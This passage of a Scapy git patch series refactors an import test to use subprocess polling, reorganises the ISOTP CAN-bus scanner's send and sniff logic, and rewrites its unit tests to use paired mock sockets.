b"NEGOEXTS\x01\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00p\x00\x00\x00\x11p\xff\xd0\xfa\xf1O\xa2o@\\\x94UhS\xcf\xa1w\x02z2\xa9bx\n!\xfb\x9e,^\xe9x\xeb\xab\xee\x91\xfd\xfc\xda\x0f\xc5\x91\x03n\xf8\xfdL\x08\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08NEGOEXTS\x03\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\x98\x00\x00\x00\x11p\xff\xd0\xfa\xf1O\xa2o@\\\x94UhS\xcf\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08@\x00\x00\x00X\x00\x00\x000V\xa0T0R0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key" assert len(nego_resp.NegotiateContexts) == 3 = SMB2 Negotiate Context in Response - Type PREAUTH From a53140e7ab76a5f2e8350824bd3cf389d1d0090b Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Tue, 1 Feb 2022 12:20:38 +0100 Subject: [PATCH 0731/1632] Refactoring imports.uts to remove multiprocessing library --- test/imports.uts | 81 +++++++++++++++++++++++++----------------------- 1 file changed, 43 insertions(+), 38 deletions(-) diff --git a/test/imports.uts b/test/imports.uts index 92ea76b32e7..635c6aba7ba 100644 --- a/test/imports.uts +++ b/test/imports.uts @@ -8,6 +8,10 @@ import os import glob import subprocess +import re +import time +import sys +from scapy.consts import WINDOWS # DEV: to add your file to this list, make sure you have # a GREAT reason. @@ -42,47 +46,48 @@ ALL_FILES = [ x.split(".")[1] not in EXCEPTION_PACKAGES ] -import importlib -from multiprocessing import Pool - -process_file_code = """# This was automatically generated -import subprocess, sys - -def process_file(file): - proc = subprocess.Popen( - [sys.executable, "-c", - "import %s" % file], - stderr=subprocess.PIPE, - encoding="utf8") - errs = "" - try: - _, errs = proc.communicate(timeout=30) - except subprocess.TimeoutExpired: - proc.kill() - errs = "Timed out (>30s)!" - if proc.returncode != 0: - return "Importing the file '%s' failed !\\n%s" % (file, errs) - return None -""" - -tmp = get_temp_file(autoext=".py", keep=True) -print(tmp) -with open(tmp, "w") as fd: - fd.write(process_file_code) - -fld, file = os.path.split(tmp) -sys.path.append(fld) -pkg = importlib.import_module(os.path.splitext(file)[0]) - NB_PROC = 1 if WINDOWS else 4 +def append_processes(processes, filename): + processes.append( + (subprocess.Popen( + [sys.executable, "-c", "import %s" % filename], + stderr=subprocess.PIPE, encoding="utf8"), + time.time(), + filename)) + +def check_processes(processes): + for i, tup in enumerate(processes): + proc, start_ts, file = tup + errs = "" + try: + _, errs = proc.communicate(timeout=0.5) + except subprocess.TimeoutExpired: + if time.time() - start_ts > 30: + proc.kill() + errs = "Timed out (>30s)!" + if proc.returncode is None: + continue + else: + print("Finished %s with %d after %f sec" % + (file, proc.returncode, time.time() - start_ts)) + if proc.returncode != 0: + for p in processes: + p[0].kill() + raise Exception( + "Importing the file '%s' failed !\\n%s" % (file, errs)) + del processes[i] + return + + def import_all(FILES): - with Pool(processes=NB_PROC) as pool: - for err in pool.imap_unordered(pkg.process_file, FILES): - if err: - print(err) - pool.terminate() - raise ImportError + processes = list() + while len(processes) == NB_PROC: + check_processes(processes) + for filename in FILES: + check_processes(processes) + if len(processes) < NB_PROC: + append_processes(processes, filename) = Try importing all core separately From 28de8ca4989171f573403f227f819941833dc8dc Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Thu, 3 Feb 2022 15:37:07 +0100 Subject: [PATCH 0732/1632] Cleanup ISOTPScan unit tests #3328 Cleanup ISOTPScan unit tests --- scapy/contrib/isotp/isotp_scanner.py | 21 +- scapy/tools/automotive/isotpscanner.py | 48 +- test/contrib/isotpscan.uts | 1001 +++++++----------------- test/tools/isotpscanner.uts | 183 ++--- 4 files changed, 405 insertions(+), 848 deletions(-) diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py index 98c1504cf9c..b455c4b1732 100644 --- a/scapy/contrib/isotp/isotp_scanner.py +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -179,24 +179,20 @@ def scan(sock, # type: SuperSocket for value in scan_range: if noise_ids and value in noise_ids: continue - + sock.send(get_isotp_packet(value, False, extended_can_id)) sock.sniff(prn=lambda pkt: get_isotp_fc(value, return_values, noise_ids, False, pkt, verbose), - timeout=sniff_time, - started_callback=lambda: sock.send( - get_isotp_packet(value, False, extended_can_id))) + timeout=sniff_time, store=False) cleaned_ret_val = dict() # type: Dict[int, Tuple[Packet, int]] - for tested_id in return_values.keys(): for value in range(max(0, tested_id - 2), tested_id + 2, 1): + sock.send(get_isotp_packet(value, False, extended_can_id)) sock.sniff(prn=lambda pkt: get_isotp_fc(value, cleaned_ret_val, noise_ids, False, pkt, verbose), - timeout=sniff_time * 10, - started_callback=lambda: sock.send( - get_isotp_packet(value, False, extended_can_id))) + timeout=sniff_time * 10, store=False) return cleaned_ret_val @@ -240,12 +236,11 @@ def scan_extended(sock, # type: SuperSocket id_list = [] # type: List[int] r = list(extended_scan_range) for ext_isotp_id in range(r[0], r[-1], scan_block_size): + send_multiple_ext(sock, ext_isotp_id, pkt, scan_block_size) sock.sniff(prn=lambda p: get_isotp_fc(ext_isotp_id, id_list, noise_ids, True, p, verbose), - timeout=sniff_time * 3, - started_callback=lambda: send_multiple_ext( - sock, ext_isotp_id, pkt, scan_block_size)) + timeout=sniff_time * 3, store=False) # sleep to prevent flooding time.sleep(sniff_time) @@ -256,12 +251,12 @@ def scan_extended(sock, # type: SuperSocket min(ext_isotp_id + scan_block_size + 2, 256)): pkt.extended_address = ext_id full_id = (value << 8) + ext_id + sock.send(pkt) sock.sniff(prn=lambda pkt: get_isotp_fc(full_id, return_values, noise_ids, True, pkt, verbose), - timeout=sniff_time * 2, - started_callback=lambda: sock.send(pkt)) + timeout=sniff_time * 2, store=False) return return_values diff --git a/scapy/tools/automotive/isotpscanner.py b/scapy/tools/automotive/isotpscanner.py index 27232ef9562..64ae223f547 100755 --- a/scapy/tools/automotive/isotpscanner.py +++ b/scapy/tools/automotive/isotpscanner.py @@ -71,6 +71,30 @@ def usage(is_error): file=sys.stderr if is_error else sys.stdout) +def create_socket(python_can_args, interface, channel): + + if PYTHON_CAN: + if python_can_args: + interface_string = "CANSocket(bustype=" \ + "'%s', channel='%s', %s)" % \ + (interface, channel, python_can_args) + arg_dict = dict((k, literal_eval(v)) for k, v in + (pair.split('=') for pair in + re.split(', | |,', python_can_args))) + sock = CANSocket(bustype=interface, channel=channel, + **arg_dict) + else: + interface_string = "CANSocket(bustype=" \ + "'%s', channel='%s')" % \ + (interface, channel) + sock = CANSocket(bustype=interface, channel=channel) + else: + sock = CANSocket(channel=channel) + interface_string = "\"%s\"" % channel + + return sock, interface_string + + def main(): extended = False piso = False @@ -148,27 +172,9 @@ def main(): print("start must be equal or smaller than end.", file=sys.stderr) sys.exit(1) - sock = None - try: - if PYTHON_CAN: - if python_can_args: - interface_string = "CANSocket(bustype=" \ - "'%s', channel='%s', %s)" % \ - (interface, channel, python_can_args) - arg_dict = dict((k, literal_eval(v)) for k, v in - (pair.split('=') for pair in - re.split(', | |,', python_can_args))) - sock = CANSocket(bustype=interface, channel=channel, - **arg_dict) - else: - interface_string = "CANSocket(bustype=" \ - "'%s', channel='%s')" % \ - (interface, channel) - sock = CANSocket(bustype=interface, channel=channel) - else: - sock = CANSocket(channel=channel) - interface_string = "\"%s\"" % channel + sock, interface_string = \ + create_socket(python_can_args, interface, channel) if verbose: print("Start scan (%s - %s)" % (hex(start), hex(end))) @@ -195,7 +201,7 @@ def main(): sys.exit(1) finally: - if sock is not None: + if sock is not None and not sock.closed: sock.close() diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index c531b7a5af7..a169d36feac 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -1,12 +1,11 @@ % Regression tests for isotp_scan -~ not_pypy vcan_socket needs_root automotive_comm disabled -* Some tests are disabled to lower the CI utilitzation + Configuration ~ conf = Imports from scapy.contrib.isotp.isotp_scanner import send_multiple_ext, filter_periodic_packets, scan_extended, scan +from test.testsocket import TestSocket with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: exec(f.read()) @@ -16,16 +15,10 @@ with open(scapy_path("test/contrib/automotive/interface_mockup.py")) as f: pkt = ISOTPHeaderEA(identifier=0x100, extended_address=1)/ISOTP_FF(message_size=100, data=b'\x00\x00\x00\x00\x00') number_of_packets = 100 -def sender(): - with new_can_socket0() as sock1: - send_multiple_ext(sock1, 0, pkt, number_of_packets) +with new_can_socket0() as sock1, new_can_socket0() as sock: + send_multiple_ext(sock1, 0, pkt, number_of_packets) + pkts = sock.sniff(timeout=4, count=number_of_packets) -thread = threading.Thread(target=sender) - -with new_can_socket0() as sock: - pkts = sock.sniff(timeout=4, count=number_of_packets, started_callback=thread.start) - -thread.join(timeout=10) assert len(pkts) == number_of_packets = Test filter_periodic_packets() with periodic packets @@ -56,7 +49,6 @@ received_packets[40] = (outlier, outlier.identifier) filter_periodic_packets(received_packets) assert len(received_packets) == 1 - = Test filter_periodic_packets() with nonperiodic packets pkt = CAN(identifier=0x200, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08') received_packets = dict() @@ -68,701 +60,306 @@ for i in range(40): filter_periodic_packets(received_packets) assert len(received_packets) == 40 -= Define helper function for dynamic sniff time tests += define helper function -def test_dynamic(f): - for t in [1, 2, 4, 10]: - try: - drain_bus(iface0) - f(0.02 * t) - return True - except AssertionError as e: - if t < 10: - sys.stderr.write("Test failed. Automatically increase sniff time and retry." + os.linesep) - else: - raise e - return False +def make_noise(p, t): + for _ in range(20): + sock_noise.send(p) + time.sleep(t) -= Define test functions += test scan -def make_noise(p, t): - with new_can_socket0() as s: - for _ in range(40): - s.send(p) - time.sleep(t) - - -def test_scan(sniff_time=0.02): - semaphore = threading.Semaphore(0) - def isotpserver(idx): - with new_can_socket0() as isocan, \ - ISOTPSocket(isocan, sid=0x700 + idx, did=0x600 + idx) as sock: - sock.sniff(timeout=sniff_time * 1500, count=1, - started_callback=semaphore.release) - listen_sockets = list() - for i in range(1, 4): - listen_sockets.append( - threading.Thread(target=isotpserver, args=(int(i),))) - listen_sockets[-1].start() - for _ in range(len(listen_sockets)): - semaphore.acquire() - with new_can_socket0() as scansock: - found_packets = scan(scansock, range(0x5ff, 0x604), noise_ids=[0x701], - sniff_time=sniff_time, verbose=True) - with new_can_socket0() as cans: - for _ in range(5): - cans.send(CAN(identifier=0x601, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x602, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x603, data=b'\x01\xaa')) - time.sleep(0) - print(len(listen_sockets)) - for thread in listen_sockets: - thread.join(timeout=1) - print(len(found_packets)) - assert len(found_packets) == 2 - - -def test_scan_extended(sniff_time=0.02): - recvpacket = CAN(flags=0, identifier=0x700, length=4, - data=b'\xaa0\x00\x00') - semaphore = threading.Semaphore(0) - def isotpserver(): - with new_can_socket0() as isocan, \ - ISOTPSocket(isocan, sid=0x700, did=0x601, - extended_addr=0xaa, extended_rx_addr=0xbb) as s: - s.sniff(timeout=1500 * sniff_time, count=1, - started_callback=semaphore.release) - thread = threading.Thread(target=isotpserver) - thread.start() - semaphore.acquire() - with new_can_socket0() as scansock: - found_packets = scan_extended(scansock, [0x600, 0x601], - extended_scan_range=range(0xb0, 0xc0), - sniff_time=sniff_time) - with new_can_socket0() as cans: - cans.send(CAN(identifier=0x601, data=b'\xbb\x01\xaa')) - thread.join(timeout=10) - fpkt = found_packets[list(found_packets.keys())[0]][0] - rpkt = recvpacket - assert fpkt.length == rpkt.length - assert fpkt.data == rpkt.data - assert fpkt.identifier == rpkt.identifier - - -def test_isotpscan_text(sniff_time=0.02): - semaphore = threading.Semaphore(0) - def isotpserver(i): - with new_can_socket0() as isocan, \ - ISOTPSocket(isocan, sid=0x700 + i, did=0x600 + i) as isotpsock: - isotpsock.sniff(timeout=1500 * sniff_time, count=1, - started_callback=semaphore.release) - pkt = CAN(identifier=0x701, length=8, - data=b'\x01\x02\x03\x04\x05\x06\x07\x08') - thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) - thread_noise.start() - thread1 = threading.Thread(target=isotpserver, args=(2,)) - thread2 = threading.Thread(target=isotpserver, args=(3,)) - thread1.start() - thread2.start() - semaphore.acquire() - semaphore.acquire() - with new_can_socket0() as scansock: - result = isotp_scan(scansock, range(0x5ff, 0x604 + 1), - output_format="text", - noise_listen_time=sniff_time * 6, - sniff_time=sniff_time, - verbose=True) - with new_can_socket0() as cans: - cans.send(CAN(identifier=0x601, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x602, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x603, data=b'\x01\xaa')) - thread1.join(timeout=10) - thread2.join(timeout=10) - thread_noise.join(timeout=10) - text = "\nFound 2 ISOTP-FlowControl Packet(s):" - assert text in result - assert "0x602" in result - assert "0x603" in result - assert "0x702" in result - assert "0x703" in result - assert "No Padding" in result - -def test_isotpscan_text_padding(sniff_time=0.02): - semaphore = threading.Semaphore(0) - def isotpserver(i): - with new_can_socket0() as isocan, \ - ISOTPSocket(isocan, sid=0x700 + i, did=0x600 + i, padding=True) as isotpsock: - isotpsock.sniff(timeout=1500 * sniff_time, count=1, - started_callback=semaphore.release) - pkt = CAN(identifier=0x701, length=8, - data=b'\x01\x02\x03\x04\x05\x06\x07\x08') - thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) - thread_noise.start() - thread1 = threading.Thread(target=isotpserver, args=(2,)) - thread2 = threading.Thread(target=isotpserver, args=(3,)) - thread1.start() - thread2.start() - semaphore.acquire() - semaphore.acquire() - with new_can_socket0() as scansock: - result = isotp_scan(scansock, range(0x5ff, 0x604 + 1), - output_format="text", - noise_listen_time=sniff_time * 6, - sniff_time=sniff_time, - verbose=True) - with new_can_socket0() as cans: - cans.send(CAN(identifier=0x601, data=b'\x01\xaaffffff')) - cans.send(CAN(identifier=0x602, data=b'\x01\xaaffffff')) - cans.send(CAN(identifier=0x603, data=b'\x01\xaaffffff')) - thread1.join(timeout=10) - thread2.join(timeout=10) - thread_noise.join(timeout=10) - text = "\nFound 2 ISOTP-FlowControl Packet(s):" - assert text in result - assert "0x602" in result - assert "0x603" in result - assert "0x702" in result - assert "0x703" in result - assert "Padding enabled" in result - - -def test_isotpscan_text_extended_can_id(sniff_time=0.02): - semaphore = threading.Semaphore(0) - def isotpserver(i): - with new_can_socket0() as isocan, \ - ISOTPSocket(isocan, - sid=0x1ffff700 + i, - did=0x1ffff600 + i) as isotpsock1: - isotpsock1.sniff(timeout=1500 * sniff_time, count=1, - started_callback=semaphore.release) - pkt = CAN(identifier=0x1ffff701, flags="extended", length=8, - data=b'\x01\x02\x03\x04\x05\x06\x07\x08') - thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) - thread_noise.start() - thread1 = threading.Thread(target=isotpserver, args=(2,)) - thread2 = threading.Thread(target=isotpserver, args=(3,)) - thread1.start() - thread2.start() - semaphore.acquire() - semaphore.acquire() - with new_can_socket0() as scansock: - result = isotp_scan(scansock, range(0x1ffff5ff, 0x1ffff604 + 1), - output_format="text", - noise_listen_time=sniff_time * 6, - sniff_time=sniff_time, - extended_can_id=True, - verbose=True) - with new_can_socket0() as cans: - cans.send(CAN(identifier=0x1ffff601, flags="extended", - data=b'\x01\xaa')) - cans.send(CAN(identifier=0x1ffff602, flags="extended", - data=b'\x01\xaa')) - cans.send(CAN(identifier=0x1ffff603, flags="extended", - data=b'\x01\xaa')) - thread1.join(timeout=10) - thread2.join(timeout=10) - thread_noise.join(timeout=10) - print(result) - text = "\nFound 2 ISOTP-FlowControl Packet(s):" - assert text in result - assert "0x1ffff602" in result - assert "0x1ffff603" in result - assert "0x1ffff702" in result - assert "0x1ffff703" in result - assert "No Padding" in result - - -def test_isotpscan_code(sniff_time=0.02): - semaphore = threading.Semaphore(0) - def isotpserver(i): - with new_can_socket0() as isocan, \ - ISOTPSocket(isocan, sid=0x700 + i, did=0x600 + i) as isotpsock: - isotpsock.sniff(timeout=1500 * sniff_time, count=1, - started_callback=semaphore.release) - pkt = CAN(identifier=0x701, length=8, - data=b'\x01\x02\x03\x04\x05\x06\x07\x08') - thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) - thread_noise.start() - thread1 = threading.Thread(target=isotpserver, args=(2,)) - thread2 = threading.Thread(target=isotpserver, args=(3,)) - thread1.start() - thread2.start() - semaphore.acquire() - semaphore.acquire() - with new_can_socket0() as scansock: - result = isotp_scan(scansock, range(0x5ff, 0x603 + 1), - output_format="code", - noise_listen_time=sniff_time * 6, - sniff_time=sniff_time, - can_interface="can0", - verbose=True) - with new_can_socket0() as cans: - cans.send(CAN(identifier=0x601, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x602, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x603, data=b'\x01\xaa')) - thread1.join(timeout=10) - thread2.join(timeout=10) - thread_noise.join(timeout=10) - s1 = "ISOTPSocket(can0, tx_id=0x602, rx_id=0x702, " \ - "padding=False, basecls=ISOTP)\n" - s2 = "ISOTPSocket(can0, tx_id=0x603, rx_id=0x703, " \ - "padding=False, basecls=ISOTP)\n" - print(result) - assert s1 in result - assert s2 in result - - -def test_isotpscan_code_noise(sniff_time=0.02): - semaphore = threading.Semaphore(0) - def isotpserver(i): - with new_can_socket0() as isocan, \ - ISOTPSocket(isocan, sid=0x700 + i, did=0x600 + i) as isotpsock: - isotpsock.sniff(timeout=1500 * sniff_time, count=1, - started_callback=semaphore.release) - pkt = CAN(identifier=0x702, length=8, - data=b'\x01\x02\x03\x04\x05\x06\x07\x08') - thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) - thread_noise.start() - thread1 = threading.Thread(target=isotpserver, args=(2,)) - thread2 = threading.Thread(target=isotpserver, args=(3,)) - thread1.start() - thread2.start() - semaphore.acquire() - semaphore.acquire() - with new_can_socket0() as scansock: - result = isotp_scan(scansock, range(0x5ff, 0x603 + 1), - output_format="code", - noise_listen_time=sniff_time * 6, - sniff_time=sniff_time, - can_interface="can0", - verbose=True) - with new_can_socket0() as cans: - cans.send(CAN(identifier=0x601, data=b'\x01\xaa')) - cans.send(CAN(identifier=0x603, data=b'\x01\xaa')) - thread1.join(timeout=10) - thread2.join(timeout=10) - thread_noise.join(timeout=10) - s2 = "ISOTPSocket(can0, tx_id=0x603, rx_id=0x703, " \ - "padding=False, basecls=ISOTP)\n" - print(result) - assert s2 in result - - - -def test_extended_isotpscan_code(sniff_time=0.02): - semaphore = threading.Semaphore(0) - def isotpserver(i): - with new_can_socket0() as isocan, \ - ISOTPSocket(isocan, sid=0x700 + i, did=0x600 + i, - extended_addr=0x11, extended_rx_addr=0x22) as s: - s.sniff(timeout=1500 * sniff_time, count=1, - started_callback=semaphore.release) - pkt = CAN(identifier=0x701, length=8, - data=b'\x01\x02\x03\x04\x05\x06\x07\x08') - thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) - thread1 = threading.Thread(target=isotpserver, args=(2,)) - thread2 = threading.Thread(target=isotpserver, args=(3,)) - thread1.start() - thread2.start() - semaphore.acquire() - semaphore.acquire() - thread_noise.start() - with new_can_socket0() as scansock: - result = isotp_scan(scansock, range(0x5ff, 0x603 + 1), - extended_scan_range=range(0x20, 0x30), - extended_addressing=True, sniff_time=sniff_time, - noise_listen_time=sniff_time * 6, - output_format="code", - can_interface="can0", verbose=True) - with new_can_socket0() as cans: - cans.send(CAN(identifier=0x602, data=b'\x22\x01\xaa')) - cans.send(CAN(identifier=0x603, data=b'\x22\x01\xaa')) - time.sleep(0) - cans.send(CAN(identifier=0x602, data=b'\x22\x01\xaa')) - cans.send(CAN(identifier=0x603, data=b'\x22\x01\xaa')) - thread1.join(timeout=10) - thread2.join(timeout=10) - thread_noise.join(timeout=10) - s1 = "ISOTPSocket(can0, tx_id=0x602, rx_id=0x702, padding=False, " \ - "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" - s2 = "ISOTPSocket(can0, tx_id=0x603, rx_id=0x703, padding=False, " \ - "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" - print(result) - assert s1 in result - assert s2 in result - - -def test_extended_isotpscan_code_extended_can_id(sniff_time=0.02): - semaphore = threading.Semaphore(0) - def isotpserver(i): - with new_can_socket0() as isocan, \ - ISOTPSocket(isocan, sid=0x1ffff700 + i, did=0x1ffff600 + i, - extended_addr=0x11, extended_rx_addr=0x22) as s: - s.sniff(timeout=1500 * sniff_time, count=1, - started_callback=semaphore.release) - pkt = CAN(identifier=0x1ffff701, flags="extended", length=8, - data=b'\x01\x02\x03\x04\x05\x06\x07\x08') - thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) - thread1 = threading.Thread(target=isotpserver, args=(2,)) - thread2 = threading.Thread(target=isotpserver, args=(3,)) - thread1.start() - thread2.start() - semaphore.acquire() - semaphore.acquire() - thread_noise.start() - with new_can_socket0() as scansock: - result = isotp_scan(scansock, range(0x1ffff5ff, 0x1ffff604 + 1), - extended_can_id=True, - extended_scan_range=range(0x20, 0x30), - extended_addressing=True, - sniff_time=sniff_time, - noise_listen_time=sniff_time * 6, - output_format="code", - can_interface="can0", - verbose=True) - with new_can_socket0() as cans: - cans.send(CAN(identifier=0x1ffff602, flags="extended", - data=b'\x22\x01\xaa')) - cans.send(CAN(identifier=0x1ffff603, flags="extended", - data=b'\x22\x01\xaa')) - thread1.join(timeout=10) - thread2.join(timeout=10) - thread_noise.join(timeout=10) - s1 = "ISOTPSocket(can0, tx_id=0x1ffff602, rx_id=0x1ffff702, padding=False, " \ - "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" - s2 = "ISOTPSocket(can0, tx_id=0x1ffff603, rx_id=0x1ffff703, padding=False, " \ +sock_sender = TestSocket(CAN) + +sockets = list() +for idx in range(1, 4): + sock_recv = TestSocket(CAN) + sock_sender.pair(sock_recv) + sockets.append(ISOTPSoftSocket(sock_recv, tx_id=0x700 + idx, rx_id=0x600 + idx)) + +found_packets = scan(sock_sender, range(0x5ff, 0x604), + noise_ids=[0x701], sniff_time=0.02, verbose=True) + +for s in sockets: + s.close() + +assert len(found_packets) == 2 +assert found_packets[0x602][0].identifier == 0x702 +assert found_packets[0x603][0].identifier == 0x703 + += test scan extended + +sock_sender = TestSocket(CAN) +sock_recv = TestSocket(CAN) +sock_sender.pair(sock_recv) + +with ISOTPSoftSocket(sock_recv, tx_id=0x700, rx_id=0x601, ext_address=0xaa, rx_ext_address=0xbb): + found_packets = scan_extended(sock_sender, [0x600, 0x601], + extended_scan_range=range(0xb0, 0xc0), + sniff_time=0.02) + +fpkt = found_packets[list(found_packets.keys())[0]][0] +rpkt = CAN(flags=0, identifier=0x700, length=4, data=b'\xaa0\x00\x00') +assert fpkt.length == rpkt.length +assert fpkt.data == rpkt.data +assert fpkt.identifier == rpkt.identifier + += scan with text output + +sock_sender = TestSocket(CAN) +sock_recv1 = TestSocket(CAN) +sock_sender.pair(sock_recv1) +sock_recv2 = TestSocket(CAN) +sock_sender.pair(sock_recv2) +sock_noise = TestSocket(CAN) +sock_sender.pair(sock_noise) + +with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602), ISOTPSoftSocket(sock_recv2, tx_id=0x703, rx_id=0x603): + pkt = CAN(identifier=0x701, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08') + make_noise(pkt, 0.01) + result = isotp_scan(sock_sender, range(0x5ff, 0x604 + 1), + output_format="text", + noise_listen_time=0.1, + sniff_time=0.02, + verbose=True) + +text = "\nFound 2 ISOTP-FlowControl Packet(s):" +assert text in result +assert "0x602" in result +assert "0x603" in result +assert "0x702" in result +assert "0x703" in result +assert "No Padding" in result + += scan with text output padding + +sock_sender = TestSocket(CAN) +sock_recv1 = TestSocket(CAN) +sock_sender.pair(sock_recv1) +sock_recv2 = TestSocket(CAN) +sock_sender.pair(sock_recv2) +sock_noise = TestSocket(CAN) +sock_sender.pair(sock_noise) + +with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602, padding=True), ISOTPSoftSocket(sock_recv2, tx_id=0x703, rx_id=0x603, padding=True): + pkt = CAN(identifier=0x701, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08') + make_noise(pkt, 0.01) + result = isotp_scan(sock_sender, range(0x5ff, 0x604 + 1), + output_format="text", + noise_listen_time=0.1, + sniff_time=0.02, + verbose=True) + +text = "\nFound 2 ISOTP-FlowControl Packet(s):" +assert text in result +assert "0x602" in result +assert "0x603" in result +assert "0x702" in result +assert "0x703" in result +assert "Padding enabled" in result + += scan with text output extended_can id + +sock_sender = TestSocket(CAN) +sock_recv1 = TestSocket(CAN) +sock_sender.pair(sock_recv1) +sock_recv2 = TestSocket(CAN) +sock_sender.pair(sock_recv2) +sock_noise = TestSocket(CAN) +sock_sender.pair(sock_noise) + +with ISOTPSoftSocket(sock_recv1, tx_id=0x1ffff702, rx_id=0x1ffff602), ISOTPSoftSocket(sock_recv2, tx_id=0x1ffff703, rx_id=0x1ffff603): + pkt = CAN(identifier=0x1ffff701, flags="extended", length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08') + make_noise(pkt, 0.01) + result = isotp_scan(sock_sender, range(0x1ffff5ff, 0x1ffff604 + 1), + output_format="text", + noise_listen_time=0.1, + sniff_time=0.02, + extended_can_id=True, + verbose=True) + +text = "\nFound 2 ISOTP-FlowControl Packet(s):" +assert text in result +assert "0x1ffff602" in result +assert "0x1ffff603" in result +assert "0x1ffff702" in result +assert "0x1ffff703" in result +assert "No Padding" in result + += scan with code output + +sock_sender = TestSocket(CAN) +sock_recv1 = TestSocket(CAN) +sock_sender.pair(sock_recv1) +sock_recv2 = TestSocket(CAN) +sock_sender.pair(sock_recv2) +sock_noise = TestSocket(CAN) +sock_sender.pair(sock_noise) + +with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602), ISOTPSoftSocket(sock_recv2, tx_id=0x703, rx_id=0x603): + pkt = CAN(identifier=0x701, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08') + make_noise(pkt, 0.01) + result = isotp_scan(sock_sender, range(0x5ff, 0x604 + 1), + output_format="code", + noise_listen_time=0.1, + sniff_time=0.02, + can_interface="can0", + verbose=True) + +s1 = "ISOTPSocket(can0, tx_id=0x602, rx_id=0x702, " \ + "padding=False, basecls=ISOTP)\n" +s2 = "ISOTPSocket(can0, tx_id=0x603, rx_id=0x703, " \ + "padding=False, basecls=ISOTP)\n" +assert s1 in result +assert s2 in result + += scan with code output noise + +sock_sender = TestSocket(CAN) +sock_recv1 = TestSocket(CAN) +sock_sender.pair(sock_recv1) +sock_recv2 = TestSocket(CAN) +sock_sender.pair(sock_recv2) +sock_noise = TestSocket(CAN) +sock_sender.pair(sock_noise) + +with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602), ISOTPSoftSocket(sock_recv2, tx_id=0x703, rx_id=0x603): + pkt = CAN(identifier=0x702, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08') + make_noise(pkt, 0.01) + result = isotp_scan(sock_sender, range(0x5ff, 0x604 + 1), + output_format="code", + noise_listen_time=0.1, + sniff_time=0.02, + can_interface="can0", + verbose=True) + +s1 = "ISOTPSocket(can0, tx_id=0x602, rx_id=0x702, " \ + "padding=False, basecls=ISOTP)\n" +s2 = "ISOTPSocket(can0, tx_id=0x603, rx_id=0x703, " \ + "padding=False, basecls=ISOTP)\n" +assert s1 not in result +assert s2 in result + += scan with code output extended_isotp + +sock_sender = TestSocket(CAN) +sock_recv1 = TestSocket(CAN) +sock_sender.pair(sock_recv1) +sock_recv2 = TestSocket(CAN) +sock_sender.pair(sock_recv2) +sock_noise = TestSocket(CAN) +sock_sender.pair(sock_noise) + +with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602, ext_address=0x11, rx_ext_address=0x22), ISOTPSoftSocket(sock_recv2, tx_id=0x703, rx_id=0x603, ext_address=0x11, rx_ext_address=0x22): + pkt = CAN(identifier=0x701, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08') + make_noise(pkt, 0.01) + result = isotp_scan(sock_sender, range(0x5ff, 0x604 + 1), + output_format="code", + noise_listen_time=0.1, + sniff_time=0.05, + extended_scan_range=range(0x20, 0x30), + extended_addressing=True, + can_interface="can0", + verbose=True) + +s1 = "ISOTPSocket(can0, tx_id=0x602, rx_id=0x702, padding=False, " \ "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" - print(result) - assert s1 in result - assert s2 in result - - -def test_isotpscan_none(sniff_time=0.02): - semaphore = threading.Semaphore(0) - def isotpserver(i): - with new_can_socket0() as isocan, \ - ISOTPSocket(isocan, sid=0x700 + i, did=0x600 + i) as s: - s.sniff(timeout=1500 * sniff_time, count=1, - started_callback=semaphore.release) - pkt = CAN(identifier=0x701, length=8, - data=b'\x01\x02\x03\x04\x05\x06\x07\x08') - thread_noise = threading.Thread(target=make_noise, args=(pkt, sniff_time,)) - thread1 = threading.Thread(target=isotpserver, args=(2,)) - thread2 = threading.Thread(target=isotpserver, args=(3,)) - thread1.start() - thread2.start() - semaphore.acquire() - semaphore.acquire() - with new_can_socket0() as socks_interface: - thread_noise.start() - with new_can_socket0() as scansock: - result = 